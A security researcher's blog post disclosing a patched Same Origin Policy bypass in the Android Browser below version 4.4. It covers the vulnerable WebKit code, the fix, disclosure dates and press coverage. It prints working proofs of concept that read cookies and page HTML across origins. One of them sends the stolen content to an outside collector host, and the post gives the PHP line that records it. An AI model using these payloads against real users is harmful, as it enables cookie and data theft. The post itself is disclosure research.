A Tale Of Another SOP Bypass In Android Browser < 4.4


Since, my recent android SOP bypass [CVE-2014-6041] triggered a lot of eruption among the infosec community, I was motivated to research a bit more upon the android browser, it turns out that things are much worse than I thought, I managed to trigger quite a few interesting vulnerabilities inside of Android browser, one of them being another Same Origin Policy Bypass vulnerability. The thing that makes it worse was the same SOP bypass was already fixed inside of chrome years ago, however the patches were not applied to Android browser < 4.4.

Proof Of Concept

The following is the proof of concept:

<script>
window.onload = function()
{
    object = document.createElement("object");
    object.setAttribute("data", "http://www.bing.com");
    document.body.appendChild(object);
    object.onload = function() {
      object.setAttribute("data", "javascript:alert(document.domain)");
        object.innerHTML = "foobar";
    }
}
</script>


The POC is very easy to understand for individuals having some javaScript background. However, for others let me break it down for you. The above code creates an object with data attribute, which loads up a URL from another origin in this case "http://www.bing.com", however once it's loaded, we replace bing.com with "javascript:alert(document.domain)". The interesting thing here is that the last line is essential for the POC to work object.innerHTML = "foobar"; so that the navigation request is performed

Let's take a look at the vulnerable code that is responsible for the causing the issue:

Vulnerable Code

bool HTMLPlugInImageElement::allowedToLoadFrameURL(const String& url)
{
    ASSERT(document());
    ASSERT(document()->frame());
    if (document()->frame()->page()->frameCount() >= Page::maxNumberOfFrames)
        return false;
    KURL completeURL = document()->completeURL(url);


The above function is responsible for loading up the frame URL, if you take a close look at the code, you would find out that there is no validation for javascript scheme, which allows us to execute javaScript in context of the frame that was loaded.

The fix

The issue was fixed by applying the following checks from securityorigin.h library.

  if (contentFrame() && protocolIsJavaScript(completeURL)
       && !document()->securityOrigin()->canAccess(contentDocument()->securityOrigin()))
       return false;

Proof Of Concept Using Postmessage Call

To help understand the vulnerability better and get to the root cause, i contacted Joe Vennix from metasploit team, who modified my original POC to the following to help demonstrate the vulnerability in an effective manner. The following POC uses postMessage call from HTML 5 world to send the document.cookie and innerHTML to the main window.

<script>
window.onload = function()
{
    object = document.createElement("object");
    object.setAttribute("data", "http://www.bing.com");
    document.body.appendChild(object);
    object.onload = function() {
        object.data = "javascript:var t=top;with(document)t.postMessage('HTML='+body.innerHTML+'&COOKIE='+cookie,'*');";
        object.innerHTML = "foobar";
    }
}

window.onmessage = function(m){
  alert(m.data);
}
</script>

Proof Of Concept To Steal Data Across Domains

A great friend of mine @filedescriptor helped me with the following POC, which steals data from bing.com by accessing the document.body.innerHTML property as submits that data cross origin by using a POST request, since you can send limited amount of data with GET due to browser restrictions.

<script>
window.onload = function()
{
object = document.createElement("object");
object.setAttribute("data", "http://www.bing.com");
document.body.appendChild(object);
object.onload = function() {
object.data = "javascript:with(document)body.innerHTML+='<form method=post action=//kcal.pw/record.php?name=__target=_><input name=content></form><iframe name=_>',__.content.value=body.innerHTML,__.submit()";
object.innerHTML = "foobar";
}
}

The PHP file hosted at record.php contains the following line, which saves the data coming from bing.com to a file called record.txt.

file_put_contents('record.txt', $_POST['content']);

The following are some of the handsets that we used to test and verify this vulnerability.

Sony Xperia



LGNexus4







Samsung Galaxy S3





Safari Browser 5.0



Google's Response

The vulnerability was responsibly disclosed to Google on 9/25/2014, The vulnerability was fixed on 10/1/2014 and the patches have been released here.

In Closing

There are tons of other browsers with huge userbase that are vulnerable to same vulnerability, Maxthon, CM Browser, Safari Browser 5.0 to name a few. In case if you are still using Android browser or any of other browser, you should immediately apply patches or switch to Chrome or firefox. I believe there are several other vulnerabilities that were addresses in chrome webkit and still have not been addressed inside of Android browser, therefore it is recommended to avoid it completely.


Press Coverage

http://news.yahoo.com/half-android-phones-still-vulnerable-massive-privacy-bug-135551464.html

http://www.redmondpie.com/massive-privacy-bug-affects-many-android-devices-heres-how-to-protect-yourself/

http://threatpost.com/second-same-origin-policy-bypass-flaw-haunts-android-browser

http://www.securityweek.com/google-patches-second-same-origin-policy-bypass-flaw-android-browser

http://www.pcworld.com/article/2823012/almost-half-of-android-devices-still-have-a-vulnerable-browser-installed.html

http://www.csoonline.com/article/2690910/application-security/android-browser-flaw-found-to-leak-data.html

http://tribune.com.pk/story/771546/on-a-roll-another-bug-exposed-by-pakistani-researcher/

https://blog.lookout.com/blog/2014/10/06/aosp-browser-vuln/

http://www.net-security.org/secworld.php?id=17459

http://www.zdnet.com/half-of-all-android-devices-still-vulnerable-to-privacy-disaster-browser-bug-7000034500/

http://www.cio.com.au/article/556967/almost-half-android-devices-still-vulnerable-browser-installed/?fp=16&fpid=1

http://www.computerworld.com/article/2822813/45-of-android-devices-still-have-a-vulnerable-browser-installed.html#tk.rss_all

http://tribune.com.pk/story/776018/bugged-half-of-android-users-vulnerable-to-privacy-disaster/

http://checkmarx.com/2014/10/21/pakistani-ethical-hacker/

3 comments:


  1. Very Nice Great work such genius Pakistani

    ReplyDelete
  2. Nice one! Congrats Rafay!

    May I ask why is object.innerHTML = "foobar" essential for the POC to work ?
    Why is CHANGING the content of the page essential for the first POC? How does this help us? Or is does more than just changing the content?

    ReplyDelete

 
Rafay Baloch is an Independent security researcher, Internet marketer, Entrepreneur and a SEO consultant, He is the founder of RHA blog and multiple other blogs. Rafay got famous after finding a Remote Code Execution bug inside PayPal for which PayPal awarded him a sum of 10,000$ Read More..

Join In!

RHA © 2013. All Rights Reserved.